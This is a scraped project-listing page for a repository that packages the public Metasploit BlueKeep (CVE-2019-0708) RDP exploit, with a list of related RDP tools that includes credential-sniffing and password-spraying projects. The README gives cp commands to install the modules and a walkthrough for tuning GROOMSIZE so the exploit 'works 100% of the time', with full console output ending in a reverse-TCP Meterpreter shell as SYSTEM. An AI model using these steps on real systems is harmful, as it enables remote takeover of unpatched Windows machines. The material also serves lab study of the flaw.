TinToSer / Bluekeep Exploit
Bluekeep(CVE 2019-0708) exploit released
Stars: ✭ 93
Programming Languages
ruby
36898 projects - #4 most used programming language
Labels
Projects that are alternatives of or similar to Bluekeep Exploit
Openiothub
💖A free IoT (Internet of Things) platform and private cloud. [一个免费的物联网和私有云平台,支持内网穿透]
Stars: ✭ 371 (+298.92%)
Mutual labels: rdp
Myrtille
A native HTML4 / HTML5 Remote Desktop Protocol and SSH client
Stars: ✭ 1,007 (+982.8%)
Mutual labels: rdp
Fatt
FATT /fingerprintAllTheThings - a pyshark based script for extracting network metadata and fingerprints from pcap files and live network traffic
Stars: ✭ 490 (+426.88%)
Mutual labels: rdp
Mremoteng
mRemoteNG is the next generation of mRemote, open source, tabbed, multi-protocol, remote connections manager.
Stars: ✭ 5,935 (+6281.72%)
Mutual labels: rdp
Cve 2019 0708
3389远程桌面代码执行漏洞CVE-2019-0708批量检测工具(Rdpscan Bluekeep Check)
Stars: ✭ 350 (+276.34%)
Mutual labels: rdp
Webterminal
ssh rdp vnc telnet sftp bastion/jump web putty xshell terminal jumpserver audit realtime monitor rz/sz 堡垒机 云桌面 linux devops sftp websocket file management rz/sz otp 自动化运维 审计 录像 文件管理 sftp上传 实时监控 录像回放 网页版rz/sz上传下载/动态口令 django
Stars: ✭ 1,124 (+1108.6%)
Mutual labels: rdp
Ipban
IPBan Monitors failed logins and bad behavior and bans ip addresses on Windows and Linux. Highly configurable, lean and powerful. Learn more at -->
Stars: ✭ 652 (+601.08%)
Mutual labels: rdp
Terminals
Terminals is a secure, multi tab terminal services/remote desktop client. It uses Terminal Services ActiveX Client (mstscax.dll). The project started from the need of controlling multiple connections simultaneously. It is a complete replacement for the mstsc.exe (Terminal Services) client. This is official source moved from Codeplex.
Stars: ✭ 971 (+944.09%)
Mutual labels: rdp
Freerdp
FreeRDP is a free remote desktop protocol library and clients
Stars: ✭ 5,858 (+6198.92%)
Mutual labels: rdp
Rdesktop
🚨 rdesktop is in need of a new maintainter. Please see the home page for more details. 🚨
Stars: ✭ 922 (+891.4%)
Mutual labels: rdp
Docker Guacamole
A self-contained guacamole docker container for x64 and ARM. Remotely connect over SSH, RDP or VNC using HTML5.
Stars: ✭ 389 (+318.28%)
Mutual labels: rdp
Seth
Perform a MitM attack and extract clear text credentials from RDP connections
Stars: ✭ 1,084 (+1065.59%)
Mutual labels: rdp
Rdpassspray
Python3 tool to perform password spraying using RDP
Stars: ✭ 368 (+295.7%)
Mutual labels: rdp
Emagnet
Automated hacking tool that will find leaked databases with 97.1% accurate to grab mail + password together from recent uploads from https://pastebin.com. Bruteforce support for spotify accounts, instagram accounts, ssh servers, microsoft rdp clients and gmail accounts
Stars: ✭ 688 (+639.78%)
Mutual labels: rdp
Simplification
Very fast LineString simplification using RDP or Visvalingam-Whyatt and a Rust binary
Stars: ✭ 78 (-16.13%)
Mutual labels: rdp
Rdpgw
Remote Desktop Gateway in Go for deploying on Linux/BSD/Kubernetes
Stars: ✭ 59 (-36.56%)
Mutual labels: rdp
bluekeep-exploit
Bluekeep(CVE 2019-0708) exploit released
https://blog.rapid7.com/2019/09/06/initial-metasploit-exploit-module-for-bluekeep-cve-2019-0708/
How To use:
Simply make folder named rdp (for convenience) in /usr/share/metasploit-framework/modules/exploits/windows/ paste this exploit file(cve_2019_0708_bluekeep_rce.rb) in the folder(rdp) and use ur metasploit skills
Also replace the files in following folders:-
rdp.rb --> /usr/share/metasploit-framework/lib/msf/core/exploit/
cp ./rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb --> /usr/share/metasploit-framework/modules/exploits/windows/rdp/
cp ./cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
like: use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
and then ur general concepts of setting rhosts,lhost,payload etc
Thanks to the Genius Group of People for their wonderful work
Note:[I am not the developer of this exploit but only an ethusiast of learning exploits]
HOW TO MAKE THE EXPLOIT WORK 100% OF THE TIME:
############################
You have to set the GROOMSIZE as show below with different combinations and error Also my VMWARE(15) windows hardware was 2GB RAM and 1 Core processor
Conclusion setting GROOMSIZE to 50 worked as good as gold
############################
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 100
GROOMSIZE => 100
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] Started reverse TCP handler on 192.168.43.84:4444
[*] 192.168.43.137:3389 - Detected RDP on 192.168.43.137:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.43.137:3389 - The target is vulnerable.
[*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 100MB, target address 0xfffffa801f000000, Channel count 1.
[*] 192.168.43.137:3389 - Surfing channels ...
[*] 192.168.43.137:3389 - Lobbing eggs ...
[*] 192.168.43.137:3389 - Forcing the USE of FREE'd object ...
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 150
GROOMSIZE => 150
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] Started reverse TCP handler on 192.168.43.84:4444
[*] 192.168.43.137:3389 - Detected RDP on 192.168.43.137:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.43.137:3389 - The target is vulnerable.
[*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 150MB, target address 0xfffffa8022200000, Channel count 1.
[*] 192.168.43.137:3389 - Surfing channels ...
[*] 192.168.43.137:3389 - Lobbing eggs ...
[-] 192.168.43.137:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 50
GROOMSIZE => 50
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] Started reverse TCP handler on 192.168.43.84:4444
[*] 192.168.43.137:3389 - Detected RDP on 192.168.43.137:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.43.137:3389 - The target is vulnerable.
[*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 50MB, target address 0xfffffa801be00000, Channel count 1.
[*] 192.168.43.137:3389 - Surfing channels ...
[*] 192.168.43.137:3389 - Lobbing eggs ...
[*] 192.168.43.137:3389 - Forcing the USE of FREE'd object ...
[*] Sending stage (206403 bytes) to 192.168.43.137
[*] Meterpreter session 2 opened (192.168.43.84:4444 -> 192.168.43.137:51854) at 2019-09-10 22:59:44 +0530
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].